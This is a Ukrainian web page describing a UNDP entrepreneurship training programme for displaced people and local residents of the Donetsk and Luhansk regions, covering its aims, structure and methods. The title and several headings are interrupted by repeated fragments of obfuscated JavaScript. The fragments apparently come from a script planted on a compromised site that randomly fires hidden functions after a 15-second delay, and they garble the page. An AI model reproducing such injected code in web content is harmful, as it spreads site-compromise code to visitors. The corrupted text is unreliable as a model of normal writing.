Програма тренінгу

НАВЧАЛЬНА ПРОГРАМА ПРООН
«Розвиток навичок підприємницької діяльності серед ВПО
та місцевого населення Донецької та Луганської областей»andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

Програма висвітлює особливості ведення підприємницької діяльності та розвитку власного бізнесу, допомагає отримати практичний досвід в створенні бізнес-ідеї та написанні бізнес-плану. Участь у навчанні підвищить рівень впевненості учасників у власних силах та допоможе розвинути їхнє підприємницьке мислення.

 andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

Очікувані результати: andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

  • Підвищити рівень стійкості ВПО до складних життєвих ситуацій та покращити їхню здатність до адаптації в новому середовищі.
  • Активізувати внутрішню мотивацію до самозайнятості та підприємництва.
  • Розвинути лідерські якості учасників, які необхідні підприємцю для започаткування власної справи, бізнес-мислення та знання про фінанси.
  • Навчити слухачів як на практиці створювати бізнес-ідеї, описувати та оцінювати їхню ефективність.
  • Розвинути практичні навички у сфері маркетингу та продажів.
  • Надати практичні поради з юридичних питань ведення підприємницької діяльності та допомогти обрати оптимальну систему оподаткування.
  • Навчити слухачів ефективно підбирати персонал, його мотивувати та розвивати.
  • Надати учасникам інформацію про можливості ПРООН щодо підтримки ВПО та місцевого населення Донецької та Луганської областей.

 

Структура тренінгу:andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

 

 

Для кращого засвоєння матеріалу під час тренінгу використовуватимуться різноманітні активні та інтерактивні методики викладання матеріалу («мозковий штурм», рольові ігри, рухливі вправи, індивідуальна робота та презентації учасників, рішення кейсів, учбові ситуації, ситуаційний аналіз та інші).

Географія навчальної програми

За підтримки:

Приєднуйся до нас на: